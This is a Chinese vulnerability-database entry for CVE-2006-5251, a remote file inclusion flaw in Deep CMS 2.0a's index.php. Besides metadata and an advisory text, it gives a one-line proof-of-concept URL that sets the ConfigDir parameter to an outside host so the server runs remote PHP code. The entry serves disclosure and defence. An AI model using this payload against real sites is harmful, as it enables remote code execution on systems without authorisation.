Deep CMS 'Index.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111218 漏洞类型 输入验证
发布时间 2006-10-09 更新时间 2006-10-19
CVE编号 CVE-2006-5251 CNNVD-ID CNNVD-200610-189
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28773
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-189
|漏洞详情
DeepCMS2.0a的index.php中存在PHP远程文件包含漏洞,远程攻击者可通过ConfigDir参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20402/info

Deep CMS is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. 

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. 

Version 2.0a is vulnerable to this issue; other versions may also be affected.

http://www.example.com[target]/[deepcms_path]/index.php?ConfigDir=http://www.example.com
|参考资料

来源:BID
名称:20402
链接:http://www.securityfocus.com/bid/20402